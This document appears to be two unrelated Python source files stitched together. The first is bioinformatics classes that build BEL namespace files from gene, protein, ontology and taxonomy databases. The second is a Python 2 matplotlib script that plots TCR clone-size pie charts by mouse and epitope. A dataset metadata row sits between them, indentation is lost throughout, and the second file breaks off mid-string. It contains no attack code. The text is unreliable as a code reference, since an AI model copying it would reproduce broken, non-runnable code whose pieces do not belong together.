elif k != species and len(v) == 1:
orthologs.update(v)
else:
print(
"WARNING! Missed case {0} - {1} - {2}".format(term_id, k, v))
orthologs = {'EGID:' + o for o in orthologs}
return orthologs
class HistoryDataSet(DataSet):
def __init__(self, dictionary={}, prefix='use-index-term-prefix'):
super().__init__(dictionary, prefix)
def get_id_update(self, term_id):
''' given an id, return the current value or "withdrawn". '''
mapping = self._dict.get(term_id)
if mapping is not None:
if mapping.get('status') == 'withdrawn':
value = 'withdrawn'
else:
value = mapping.get('new_id')
else:
value = None
return value
def get_obsolete_ids(self):
''' return dict with all obsolete ids, and current value.'''
value = None
replacement_dict = {}
for term_id in self._dict:
mapping = self._dict.get(term_id)
if mapping.get('status') == 'withdrawn':
value = 'withdrawn'
else:
value = self.get_id_update(term_id)
replacement_dict[term_id] = value
return replacement_dict
def __str__(self):
return self._prefix + '_history'
class NamespaceDataSet(DataSet):
ids = False # make .belns file containing labels (default = False)
labels = True # make .bels file containing ids (default = True)
# namespace ('ns') and/or annotation ('anno') concept scheme
scheme_type = ['ns']
def __init__(
self,
dictionary={},
name='namespace-name',
prefix='namespace-prefix',
domain=['other']):
self._name = name
self._domain = domain
super().__init__(dictionary, prefix)
def get_label(self, term_id):
''' Return the value to be used as the preferred
label for the associated term id. Use id as default,
but will generally be a name/symbol. '''
return term_id
def get_xrefs(self, term_id):
''' Return equivalences to other namespaces (or None). '''
return None
def get_name(self, term_id):
''' Return the term name to use as title (or None). '''
try:
name = self._dict.get(term_id).get('name')
return name
except:
return None
def get_species(self, term_id):
''' Return species as NCBI tax ID (or None, as applicable). '''
return None
def get_encoding(self, term_id):
''' Return encoding (allowed abundance types) for value.
Default = 'A' (Abundance). '''
return 'A'
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
if 'anno' not in self.scheme_type:
return None
else:
return {'AnnotationConcept'}
def get_alt_symbols(self, term_id):
''' Return set of symbol synonyms. Default = None. '''
return None
def get_alt_names(self, term_id):
''' Return set of name synonyms. Default = None. '''
return None
def get_alt_ids(self, term_id):
''' Returns set of alternative IDs. IDs should be
unique. '''
try:
alt_ids = self._dict.get(term_id).get('alt_ids')
except:
alt_ids = set()
if alt_ids:
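            # note: str.lstrip strips any of the given *characters* from the
            # left, not a literal prefix; this is only safe while the remaining
            # ID does not itself start with one of those characters.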
alt_ids = {a.lstrip(self._prefix.upper() + ':') for a in alt_ids}
alt_ids = {a.lstrip(self._prefix.upper() + 'ID:') for a in alt_ids}
return alt_ids
def write_ns_values(self, dir):
data_names = {}
data_ids = {}
for term_id in self.get_values():
encoding = self.get_encoding(term_id)
label = self.get_label(term_id)
data_names[label] = encoding
data_ids[term_id] = encoding
if self.get_alt_ids(term_id):
for alt_id in self.get_alt_ids(term_id):
data_ids[alt_id] = encoding
if self.labels:
self.write_data(data_names, dir, self._name + '.belns')
if self.ids:
self.write_data(data_ids, dir, self._name + '-ids.belns')
def write_data(self, data, dir, name):
if len(data) == 0:
print(' WARNING: skipping writing ' +
name + '; no namespace data found.')
else:
with open(os.path.join(dir, name), mode='w', encoding='utf8') as f:
# insert header chunk
if os.path.exists(dir + '/templates/' + name):
tf = open(dir + '/templates/' + name, encoding="utf-8")
header = tf.read().rstrip()
tf.close()
# add Namespace, Citation and Author values
# source_file attribute added to object during parsing
header = get_citation_info(name, header, self.source_file)
else:
print(
'WARNING: Missing header template for {0}'.format(name))
header = '[Values]'
f.write(header + '\n')
# write data
for i in sorted(data.items()):
f.write('|'.join(i) + '\n')
def __str__(self):
return self._prefix
class StandardCustomData(NamespaceDataSet, HistoryDataSet):
def __init__(self, dictionary={}, *, name, prefix, domain):
super().__init__(dictionary, name, prefix, domain)
self._dict = {} # make unique dict for each instance of class
def get_values(self):
for term_id in self._dict:
if term_id is not None and self._dict.get(
term_id).get('OBSOLETE') != 1:
yield term_id
def get_label(self, term_id):
''' Return the value to be used as the preferred
label for the associated term id. '''
label = self._dict.get(term_id).get('LABEL')
return label
def get_xrefs(self, term_id):
xrefs = set(self._dict.get(term_id).get('XREF').split('|'))
xrefs = {x.strip() for x in xrefs if ':' in x}
return xrefs
def get_species(self, term_id):
species = self._dict.get(term_id).get('SPECIES')
return species
def get_encoding(self, term_id):
encoding = self._dict.get(term_id).get('TYPE')
return encoding
def get_alt_names(self, term_id):
synonyms = set()
synonyms.update(self._dict.get(term_id).get('SYNONYMS').split('|'))
synonyms = {s for s in synonyms if s}
return synonyms
def get_obsolete_ids(self):
''' return dict with all obsolete ids, and current value.'''
# TODO Add alt id handling,
value = None
replacement_dict = {}
for term_id in self._dict:
if self._dict.get(term_id).get('OBSOLETE') == 1:
mapping = self._dict.get(term_id)
value = 'withdrawn'
replacement_dict[term_id] = value
return replacement_dict
class EntrezInfoData(NamespaceDataSet):
ENC = {
'protein-coding': 'GRP', 'miscRNA': 'GR', 'ncRNA': 'GR',
'snoRNA': 'GR', 'snRNA': 'GR', 'tRNA': 'GR', 'scRNA': 'GR',
'other': 'G', 'pseudo': 'GR', 'unknown': 'GRP', 'rRNA': 'GR'
}
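    # Encoding strings are the BEL abundance types allowed for a term:
    # G = gene, R = RNA, M = microRNA, P = protein ('GRP' = gene, RNA, protein).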
subject = "gene/RNA/protein"
description = "NCBI Entrez Gene identifiers for Homo sapiens, Mus musculus, and Rattus norvegicus."
def __init__(
self,
dictionary={},
*,
name='entrez-gene',
prefix='egid',
domain=['gene and gene product'],
ids=True,
labels=False):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
self.labels = labels
def get_label(self, term_id):
        ''' Return the value to be used as the preferred
label for the associated term id. For Entrez,
using the gene ID. '''
return term_id
def get_species(self, term_id):
''' Return species as NCBI tax ID (or None, as applicable). '''
species = self._dict.get(term_id).get('tax_id')
return species
def get_encoding(self, gene_id):
''' Return encoding (allowed abundance types) for value. '''
mapping = self._dict.get(gene_id)
gene_type = mapping.get('type_of_gene')
description = mapping.get('description')
encoding = EntrezInfoData.ENC.get(gene_type, 'G')
if gene_type == 'ncRNA' and 'microRNA' in description:
encoding = 'GRM'
if gene_type not in EntrezInfoData.ENC:
print(
'WARNING ' +
gene_type +
' not defined for Entrez. G assigned as default encoding.')
return encoding
def get_xrefs(self, term_id):
''' Returns xrefs to HGNC, MGI, RGD. '''
targets = ('MGI:', 'HGNC:', 'RGD:')
xrefs = set()
mapping = self._dict.get(term_id)
xrefs.update(mapping.get('dbXrefs').split('|'))
# normalize xrefs with duplicated prefix
# e.g., HGNC:HGNC:5
xrefs = {x.split(':', x.count(':') - 1)[-1] for x in xrefs}
xrefs = {x for x in xrefs if x.startswith(targets)}
return xrefs
def get_alt_symbols(self, gene_id):
''' Return set of symbol synonyms. '''
synonyms = set()
mapping = self._dict.get(gene_id)
        if mapping.get('Synonyms') != '-':
synonyms.update(mapping.get('Synonyms').split('|'))
synonyms.add(mapping.get('Symbol'))
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
        if mapping.get('Other_designations') != '-':
synonyms.update(mapping.get('Other_designations').split('|'))
if mapping.get('description') != '-':
synonyms.add(mapping.get('description'))
return synonyms
def get_name(self, term_id):
''' Get official term name. '''
mapping = self._dict.get(term_id)
name = mapping.get('Full_name_from_nomenclature_authority')
return name
class EntrezHistoryData(HistoryDataSet):
def __init__(self, dictionary={}, prefix='egid'):
super().__init__(dictionary, prefix)
class HGNCData(NamespaceDataSet, OrthologyData, HistoryDataSet):
ENC = {
'gene with protein product': 'GRP', 'RNA, cluster': 'GR',
'RNA, long non-coding': 'GR', 'RNA, micro': 'GRM',
'RNA, ribosomal': 'GR', 'RNA, small cytoplasmic': 'GR',
'RNA, small misc': 'GR', 'RNA, small nuclear': 'GR',
'RNA, small nucleolar': 'GR', 'RNA, transfer': 'GR',
'phenotype only': 'G', 'RNA, pseudogene': 'GR',
'T cell receptor pseudogene': 'GR',
'immunoglobulin pseudogene': 'GR', 'pseudogene': 'GR',
'T cell receptor gene': 'GRP',
'complex locus constituent': 'GRP',
'endogenous retrovirus': 'G', 'fragile site': 'G',
'immunoglobulin gene': 'GRP', 'protocadherin': 'GRP',
'readthrough': 'GR', 'region': 'G',
'transposable element': 'G', 'unknown': 'GRP',
'virus integration site': 'G', 'RNA, micro': 'GRM',
'RNA, misc': 'GR', 'RNA, Y': 'GR', 'RNA, vault': 'GR',
'T-cell receptor gene':'G','T-cell receptor pseudogene':'G',
}
def __init__(
self,
dictionary={},
*,
name='hgnc-human-genes',
prefix='hgnc',
domain=['gene and gene product']):
super().__init__(dictionary, name, prefix, domain)
def get_values(self):
for term_id in self._dict:
if '~withdrawn' not in self._dict.get(term_id).get('Symbol'):
yield term_id
def get_id_update(self, term_id):
mapping = self._dict.get(term_id)
if mapping is None:
return None
else:
if mapping.get('Locus Type') == 'withdrawn':
name = self.get_name(term_id)
if 'entry withdrawn' in name:
return 'withdrawn'
elif 'symbol withdrawn' in name:
new_symbol = name.split('see ')[1]
new_id = None
for term_id in self._dict:
if new_symbol == self.get_label(term_id):
new_id = term_id
continue
return new_id
else:
return term_id
def get_obsolete_ids(self):
obsolete = {}
for term_id in self._dict:
if 'withdrawn' in self.get_label(term_id):
obsolete[term_id] = self.get_id_update(term_id)
return obsolete
def get_label(self, term_id):
''' Return preferred label associated with term id. '''
mapping = self._dict.get(term_id)
if mapping is None:
return None
else:
label = mapping.get('Symbol')
return label
def get_encoding(self, term_id):
mapping = self._dict.get(term_id)
locus_type = mapping.get('Locus Type')
encoding = HGNCData.ENC.get(locus_type, 'G')
if locus_type not in HGNCData.ENC:
print(
'WARNING ' +
locus_type +
' not defined for HGNC. G assigned as default encoding.')
return encoding
def get_species(self, term_id):
return '9606'
def get_alt_symbols(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('Synonyms'):
symbol_synonyms = [s.strip()
for s in mapping.get('Synonyms').split(',')]
synonyms.update(symbol_synonyms)
if mapping.get('Previous Symbols'):
old_symbols = [s.strip()
for s in mapping.get('Previous Symbols').split(',')]
synonyms.update(old_symbols)
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('Previous Names'):
old_names = [s.strip('" ') for s in mapping.get(
'Previous Names').split(', "')]
synonyms.update(old_names)
return synonyms
def get_name(self, term_id):
mapping = self._dict.get(term_id)
name = mapping.get('Approved Name')
return name
def get_orthologs(self, term_id):
orthologs = set()
mapping = self._dict.get(term_id)
mouse_orthologs = mapping.get('mouse_ortholog_id').split('|')
orthologs.update(mouse_orthologs)
rat_orthologs = mapping.get('rat_ortholog_id').split('|')
orthologs.update(rat_orthologs)
return orthologs
class MGIData(NamespaceDataSet):
ENC = {
'gene': 'GRP', 'protein coding gene': 'GRP',
'non-coding RNA gene': 'GR', 'rRNA gene': 'GR',
'tRNA gene': 'GR', 'snRNA gene': 'GR', 'snoRNA gene': 'GR',
'miRNA gene': 'GRM', 'scRNA gene': 'GR',
'lincRNA gene': 'GR', 'RNase P RNA gene': 'GR',
'RNase MRP RNA gene': 'GR', 'telomerase RNA gene': 'GR',
'unclassified non-coding RNA gene': 'GR',
'heritable phenotypic marker': 'G', 'gene segment': 'G',
'unclassified gene': 'GRP', 'other feature types': 'G',
'pseudogene': 'GR', 'transgene': 'G',
'other genome feature': 'G', 'pseudogenic region': 'GR',
'polymorphic pseudogene': 'GRP',
'pseudogenic gene segment': 'GR', 'SRP RNA gene': 'GR',
'antisense lncRNA gene': 'GR', 'lncRNA gene': 'GR',
'intronic lncRNA gene': 'GR', 'ribozyme gene': 'GR'
}
def __init__(
self,
dictionary={},
*,
name='mgi-mouse-genes',
prefix='mgi',
domain=['gene and gene product']):
super().__init__(dictionary, name, prefix, domain)
def get_values(self):
for term_id in self._dict:
mapping = self._dict.get(term_id)
marker_type = mapping.get('Marker Type')
if marker_type == 'Gene' or marker_type == 'Pseudogene':
yield term_id
def get_species(self, term_id):
return '10090'
def get_encoding(self, term_id):
feature_type = self._dict.get(term_id).get('Feature Type')
encoding = self.ENC.get(feature_type, 'G')
if feature_type not in self.ENC:
print(
'WARNING ' +
feature_type +
' not defined for MGI. G assigned as default encoding.')
return encoding
def get_label(self, term_id):
try:
label = self._dict.get(term_id).get('Symbol')
return label
except:
return None
def get_name(self, term_id):
mapping = self._dict.get(term_id)
name = mapping.get('Marker Name')
return name
def get_alt_symbols(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms = mapping.get('Marker Synonyms').split('|')
synonyms = {s for s in synonyms if s}
return synonyms
class RGDData(NamespaceDataSet):
ENC = {
'gene': 'GRP', 'miscrna': 'GR', 'predicted-high': 'GRP',
'predicted-low': 'GRP', 'predicted-moderate': 'GRP',
'protein-coding': 'GRP', 'pseudo': 'GR', 'snrna': 'GR',
'trna': 'GR', 'rrna': 'GR', 'ncrna': 'GR'
}
def __init__(
self,
dictionary={},
*,
name='rgd-rat-genes',
prefix='rgd',
domain=['gene and gene product']):
super().__init__(dictionary, name, prefix, domain)
def get_species(self, term_id):
''' Rat '''
return '10116'
def get_label(self, term_id):
''' Use Symbol as preferred label for RGD. '''
try:
label = self._dict.get(term_id).get('SYMBOL')
return label
except:
return None
def get_name(self, term_id):
name = self._dict.get(term_id).get('NAME')
return name
def get_encoding(self, term_id):
gene_type = self._dict.get(term_id).get('GENE_TYPE')
name = self.get_name(term_id)
encoding = RGDData.ENC.get(gene_type, 'G')
        if gene_type in ('miscrna', 'ncrna') and 'microRNA' in name:
encoding = 'GRM'
if gene_type not in RGDData.ENC:
print(
'WARNING ' +
gene_type +
' not defined for RGD. G assigned as default encoding.')
return encoding
def get_alt_symbols(self, term_id):
synonyms = set()
if self._dict.get(term_id).get('OLD_SYMBOL'):
old_symbols = self._dict.get(term_id).get('OLD_SYMBOL').split(';')
synonyms.update(old_symbols)
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('OLD_NAME'):
old_names = mapping.get('OLD_NAME').split(';')
synonyms.update(old_names)
synonyms = {s for s in synonyms if s}
return synonyms
class RGDObsoleteData(HistoryDataSet):
def __init__(self, dictionary={}, prefix='rgd'):
super().__init__(dictionary, prefix)
class SwissProtData(NamespaceDataSet):
def __init__(
self,
dictionary=defaultdict(list),
*,
name='swissprot',
prefix='sp',
domain=['gene and gene product'],
ids=True):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
def get_encoding(self, term_id):
return 'GRP'
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_name(self, term_id):
mapping = self._dict.get(term_id)
name = mapping.get('recommendedFullName')
return name
def get_alt_ids(self, term_id):
alt_ids = self._dict.get(term_id).get('accessions')
alt_ids = set(alt_ids)
alt_ids = {alt_id for alt_id in alt_ids if alt_id != term_id}
return alt_ids
def get_alt_symbols(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('alternativeShortNames'))
if mapping.get('recommendedShortName'):
            synonyms.add(mapping.get('recommendedShortName'))
if mapping.get('geneName'):
synonyms.add(mapping.get('geneName'))
if mapping.get('geneSynonyms'):
synonyms.update(mapping.get('geneSynonyms'))
return synonyms
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('alternativeFullNames'))
return synonyms
def get_xrefs(self, term_id):
''' Returns GeneIDs or HGNC/MGI/RGD IDs. '''
mapping = self._dict.get(term_id)
xrefs = set()
xrefs_dict = mapping.get('dbreference')
for ns, values in xrefs_dict.items():
if ns == 'GeneId':
values = {('EGID:' + v) for v in values}
xrefs.update(values)
elif ns == 'HGNC' or ns == 'MGI':
xrefs.update(values)
elif ns == 'RGD':
values = {('RGD:' + v) for v in values}
xrefs.update(values)
return xrefs
def get_species(self, term_id):
species = self._dict.get(term_id).get('tax_id')
return species
class AffyData(NamespaceDataSet):
def __init__(
self,
dictionary=defaultdict(list),
*,
name='affy-probeset',
prefix='affx',
domain=['gene and gene product'],
ids=True,
labels=False):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
self.labels = labels
def get_species(self, term_id):
species = self._dict.get(term_id).get('Species')
species_dict = {'Homo sapiens': '9606',
'Mus musculus': '10090',
'Rattus norvegicus': '10116'}
tax_id = species_dict.get(species)
return tax_id
def get_encoding(self, term_id):
''' Return encoding (allowed abundance types) for value.
R - RNAAbundance. '''
return 'R'
def get_xrefs(self, term_id):
''' Returns equivalent Entrez Gene IDs for value . '''
entrez_ids = self._dict.get(term_id).get('Entrez Gene').split('///')
if entrez_ids[0] == '---':
return None
else:
entrez_ids = ['EGID:' + eid.strip() for eid in entrez_ids]
return set(entrez_ids)
class CHEBIData(NamespaceDataSet):
def __init__(
self,
dictionary={},
*,
name='chebi',
prefix='chebi',
domain=['chemical'],
ids=True):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
if mapping.get('synonyms'):
synonyms.update(mapping.get('synonyms'))
return synonyms
class Gene2AccData(DataSet):
def __init__(self, dictionary={}, prefix='gene2acc'):
super().__init__(dictionary, prefix)
def get_eq_values(self):
for entrez_gene in self._dict:
mapping = self._dict.get(entrez_gene)
status = mapping.get('status')
taxid = mapping.get('tax_id')
yield entrez_gene, status, taxid
class GOData(NamespaceDataSet, HistoryDataSet):
# dictionary is required, since GO file parsed into multiple objects
def __init__(self, dictionary, *, name, prefix, domain, ids=True):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
def get_values(self):
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
continue
else:
yield term_id
def get_obsolete_ids(self):
obsolete = {}
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
obsolete[term_id] = 'withdrawn'
return obsolete
def get_id_update(self, term_id):
if self._dict.get(term_id):
if self._dict.get(term_id).get('is_obsolete'):
return 'withdrawn'
else:
return term_id
else:
return None
def get_label(self, term_id):
label = self._dict.get(term_id).get('termname')
return label
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('synonyms'))
return synonyms
def get_encoding(self, term_id):
if self._dict.get(term_id).get('complex'):
encoding = 'C'
elif self._prefix == 'gobp':
encoding = 'B'
else:
encoding = 'A'
return encoding
class MESHData(NamespaceDataSet):
# NOTE dictionary and other arguments are required since MeSH file parsed
# into multiple objects
def __init__(
self,
dictionary,
*,
name,
prefix,
domain,
ids=True,
scheme_type=['ns']):
super().__init__(dictionary, name, prefix, domain)
self.ids = ids
self.scheme_type = scheme_type
def get_label(self, term_id):
label = self._dict.get(term_id).get('mesh_header')
return label
def get_encoding(self, term_id):
if self._prefix == 'meshd':
return 'O'
elif self._prefix == 'meshpp':
return 'B'
else:
return 'A'
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
if 'anno' not in self.scheme_type:
return None
else:
if self._prefix == 'meshd':
return {'Disease'}
elif self._prefix == 'mesha':
return {'Anatomy'}
elif self._prefix == 'meshcs':
return {'Location'}
else:
return None
def get_alt_names(self, term_id):
synonyms = set()
mapping = self._dict.get(term_id)
synonyms.update(mapping.get('synonyms'))
return synonyms
class SwissWithdrawnData(HistoryDataSet):
def __init__(self, dictionary={}, prefix='sp'):
super().__init__(dictionary, prefix)
def get_obsolete_ids(self):
accessions = self._dict.get('accessions')
obsolete = {}
for a in accessions:
obsolete[a] = 'withdrawn'
return obsolete
def get_id_update(self, term_id):
if term_id in self._dict.get('accessions'):
return 'withdrawn'
else:
return None
class OWLData(NamespaceDataSet, HistoryDataSet):
def __init__(
self,
dictionary={},
*,
name,
prefix,
domain,
ids=True,
scheme_type):
super().__init__(dictionary, name, prefix, domain)
self._dict = {} # make unique dict for each instance of class
self.ids = ids
self.scheme_type = scheme_type
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_encoding(self, term_id):
return 'O'
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
concept_type = set()
if 'anno' not in self.scheme_type:
return None
elif self._prefix == 'clo':
concept_type = {'CellLine'}
elif self._prefix == 'cl':
concept_type = {'Cell'}
elif self._prefix == 'uberon':
concept_type = {'Anatomy'}
elif self._prefix == 'efo':
concept_type = self._dict.get(term_id).get("term_type")
elif self._prefix == 'do':
concept_type = {'Disease'}
return concept_type
def get_alt_names(self, term_id):
mapping = self._dict.get(term_id)
synonyms = set(mapping.get('synonyms'))
return synonyms
def find_xref(self, ref):
''' Used only in equiv module. '''
for term_id, mapping in self._dict.items():
dbxrefs = mapping.get('dbxrefs')
if ref in dbxrefs:
return term_id
def get_xrefs(self, term_id):
''' Returns MeSH (MSH) xrefs for a given DO ID . '''
xrefs = set()
mapping = self._dict.get(term_id)
xrefs.update(mapping.get('dbxrefs'))
if self._prefix == 'do':
xrefs = {x.replace('MSH:', 'MESHD:')
for x in xrefs if x.startswith('MSH:')}
return xrefs
def get_obsolete_ids(self):
obsolete = {}
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
obsolete[term_id] = 'withdrawn'
return obsolete
def get_id_update(self, term_id):
if self._dict.get(term_id):
if self._dict.get(term_id).get('is_obsolete'):
return 'withdrawn'
else:
return term_id
else:
return None
class NCBITaxonomyData(NamespaceDataSet):
def __init__(
self,
dictionary={},
*,
name,
prefix,
domain,
ids=True,
scheme_type):
super().__init__(dictionary, name, prefix, domain)
self.scheme_type = scheme_type
def get_label(self, term_id):
label = self._dict.get(term_id).get('name')
return label
def get_alt_names(self, term_id):
mapping = self._dict.get(term_id)
synonyms = set(mapping.get('synonyms'))
return synonyms
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
if 'anno' not in self.scheme_type:
return None
else:
return {'Species'}
| apache-2.0 | -6,744,172,609,000,880,000 | 31.792934 | 109 | 0.536599 | false | 3.776673 | false | false | false |
phbradley/tcr-dist | make_mouse_table.py | 1 | 8705 | from basic import *
import html_colors
import util
with Parser(locals()) as p:
# p.str('args').unspecified_default().multiple().required()
p.str('clones_file').required()
p.str('outfile_prefix')
p.flag('horizontal_lines')
p.flag('show')
p.flag('include_counts_in_mouse_labels')
if not outfile_prefix:
outfile_prefix = clones_file[:-4]
import matplotlib
if not show: matplotlib.use('Agg')
import matplotlib.pyplot as plt
#import numpy as np
# all_tcrs = {}
# all_epitopes = []
# infields = []
# for line in open( clones_file,'r'):
# if not infields:
# if line[0] == '#':
# infields = line[1:-1].split('\t')
# else:
# infields = line[:-1].split('\t')
# continue
# assert infields
# l = parse_tsv_line( line[:-1], infields )
# mouse = l['mouse']
# epitope = l['epitope']
# clone_size = int(l['clone_size'])
# if mouse not in all_tcrs:
# all_tcrs[mouse] = {}
# if epitope not in all_tcrs[mouse]:
# all_tcrs[mouse][epitope] = []
# if epitope not in all_epitopes:
# all_epitopes.append( epitope )
# all_tcrs[mouse][epitope].append( clone_size ) ## just store the clone sizes
all_tcrs = parse_tsv_file( clones_file, ['subject','epitope'], ['clone_size'], False )
all_epitopes = list( reduce( set.union, ( set( x.keys() ) for x in all_tcrs.values() ) ) )
all_epitopes.sort()
all_mice= all_tcrs.keys()[:]
all_mice.sort()
counts = {}
for e in all_epitopes: counts[e] = [0,0]
for m in all_mice: counts[m] = [0,0]
for mouse in all_tcrs:
for epitope in all_tcrs[mouse]:
clone_sizes = [int(x[0]) for x in all_tcrs[mouse][epitope]]
total_reads = sum(clone_sizes)
for k in [mouse,epitope]:
counts[k][0] += len(clone_sizes)
counts[k][1] += total_reads
mouse_labels = {}
for mouse in all_mice:
if include_counts_in_mouse_labels:
mouse_labels[mouse] = '{} ({};{})'.format( mouse, counts[mouse][0], counts[mouse][1] )
else:
mouse_labels[mouse] = mouse
epitope_labels = {}
for epitope in all_epitopes:
epitope_labels[epitope] = '{} ({};{})'.format( epitope, counts[epitope][0], counts[epitope][1] )
nrows = len( all_mice )
ncols = len( all_epitopes )
preferred_plot_width = 12.0
preferred_plot_height = 12.0
preferred_cell_size = max( 0.5, min( preferred_plot_height/nrows, preferred_plot_width/ncols ) )
plot_width = ncols * preferred_cell_size
plot_height = nrows * preferred_cell_size
fontsize_small = 8.
fontsize_medium = 10.
fontsize_names = 12.
for repeat in range(3):
if plot_width <= 1.2 * preferred_plot_width and plot_height <= 1.2 * preferred_plot_height: break
if plot_width / preferred_plot_width > plot_height / preferred_plot_height: ## too wide
plot_width *= 0.75
plot_height *= 0.9
fontsize_small *= 0.9
fontsize_medium *= 0.9
else: ## too tall
plot_height *= 0.75
plot_width *= 0.9
fontsize_small *= 0.9
fontsize_medium *= 0.9
fontsize_small = max(5,int(floor(0.5+fontsize_small)))
fontsize_medium = max(6,int(floor(0.5+fontsize_medium)))
fudge = 1.2
bottom_spacer = 0.3 # inches
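# margins are sized from the longest labels: roughly (fontsize/72) inches per
# character, scaled by `fudge` so the mouse/epitope names fit inside the figure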
left_margin_inches = fudge * max( ( len(mouse_labels[x]) for x in all_mice ) ) * 0.6 * fontsize_names / 72.0
bottom_margin_inches = fudge * max( ( len(epitope_labels[x]) for x in all_epitopes ) ) * 0.75 * fontsize_names / 72.0 + bottom_spacer
top_margin_inches = 0.25
right_margin_inches = 0.25
fig_width = left_margin_inches + plot_width + right_margin_inches
fig_height = bottom_margin_inches + plot_height + top_margin_inches
top_margin = float( bottom_margin_inches + plot_height ) / fig_height
bottom_margin = float( bottom_margin_inches ) / fig_height
left_margin = float( left_margin_inches ) / fig_width
right_margin = float( left_margin_inches + plot_width ) / fig_width
print 'fig_width: {:.1f} fig_height: {:.1f}'.format(fig_width,fig_height)
fig = plt.figure(1,figsize=(fig_width,fig_height))
#fig = plt.figure(1,figsize=(23,8))
#fig1.add_line(Line2D([0.5,0.5], [0,1], linewidth=2, color='blue'))
#ax = fig.add_axes( [ left_margin, bottom_margin, right_margin,top_margin ] )
#ax.grid(True)
plotno=0
for mouse in all_mice:
for epitope in all_epitopes:
plotno += 1
if epitope not in all_tcrs[mouse]:
continue
plt.subplot( nrows, ncols, plotno )
clone_sizes = [int(x[0]) for x in all_tcrs[mouse][epitope]]
clone_sizes.sort()
clone_sizes.reverse()
colors = html_colors.get_rank_colors_no_lights(len(clone_sizes))
wedges, texts = plt.pie( clone_sizes )
for ii,w in enumerate(wedges):
w.set_edgecolor('none')
w.set_facecolor(colors[ii])
topsize = clone_sizes[0]
total_size = sum(clone_sizes)
## show the size of the largest wedge?
if len(wedges)>1:
w = wedges[0]
#print w.center, w.r, w.theta1, w.theta2
## show the size at radius distance in middle of edge
angle_degrees = w.theta2*0.5
if 65<=angle_degrees<=115: angle_degrees = 65. if angle_degrees < 90. else 115.
x=1.1*w.r*math.cos( math.pi * angle_degrees / 180.0 )
y=1.1*w.r*math.sin( math.pi * angle_degrees / 180.0 )
thresh = 0.3*w.r
ha = 'left' if x>thresh else ( 'center' if x>-thresh else 'right' )
va = 'bottom' if y>thresh else ( 'center' if y>-thresh else 'top' )
plt.text(x,y,`topsize`,fontdict={'fontsize':fontsize_small},color='r',
horizontalalignment=ha,verticalalignment=va)
## show the total number of reads
radius = wedges[0].r
plt.text(0,-1.1*radius,`total_size`,fontdict={'fontsize':fontsize_medium},
horizontalalignment='center',verticalalignment='top' )
#t = plt.title(`sum(clone_sizes)`,fontdict={'fontsize':8})
if False:
if epitope==all_epitopes[0]:
plt.title(mouse)
elif mouse==all_mice[0]:
plt.title(epitope)
#break
#break
#plt.hlines(0.5,0.0,1.0)
#plt.vlines(0.5,0.0,1.0)
epsilon = 0.0
plt.subplots_adjust(
left=left_margin+epsilon,
right=right_margin-epsilon,
bottom=bottom_margin+epsilon,
top=top_margin-epsilon
)
ywidth = (top_margin-bottom_margin) / ( len(all_mice) )
xwidth = (right_margin-left_margin) / ( len(all_epitopes) )
#ystep = (top_margin-bottom_margin) / ( len(all_epitopes)-1 )
lines = []
# if horizontal_lines:
# for ii in range(len(all_epitopes)):
# #for ii in range(len(all_epitopes)+1):
# y = bottom_margin + 1.02 * ii * ywidth
# lines.append( matplotlib.lines.Line2D( [0,1], [y,y],
# transform=fig.transFigure, figure=fig, c='k' ) )
if False:
for ii in range(len(all_mice)+1):
x = left_margin + ii*xwidth
lines.append( matplotlib.lines.Line2D( [x,x], [0,1],
transform=fig.transFigure, figure=fig, c='k' ) )
fig.lines.extend(lines)
for ii,mouse in enumerate( all_mice ):
plt.figtext( left_margin-0.005, top_margin - 3*ywidth/5 - ii * ywidth, mouse_labels[mouse], ha='right', va='center',
fontdict={'fontsize':fontsize_names})
#plt.figtext( right_margin+0.005, top_margin - 3*ywidth/5 - ii * ywidth, epitope,ha='left')
#xstep = (right_margin-left_margin) / ( len(all_mice)-1 )
for ii,epitope in enumerate( all_epitopes ):
#name = mouse[:]
# if name[0] == 'd' and 'Mouse' in name:
# name = name.replace('Mouse','_')
plt.figtext(left_margin + xwidth/2 + ii * xwidth, bottom_margin - (bottom_spacer)/fig_height,
epitope_labels[epitope],
rotation='vertical', ha='center', va='top',
fontdict={'fontsize':fontsize_names})
#plt.figtext(left_margin + xwidth/2 + ii * xwidth, 0.98, epitope, ha='center', va='top' )
pngfile = outfile_prefix+'_subject_table.png'
print 'making:',pngfile
plt.savefig(pngfile)
util.readme(pngfile,"""This subject-table plot shows all the successfully parsed, paired reads, split by mouse/subject (the rows)
and epitope (the columns, labeled at the bottom). The epitope column labels include in parentheses the number of clones followed by
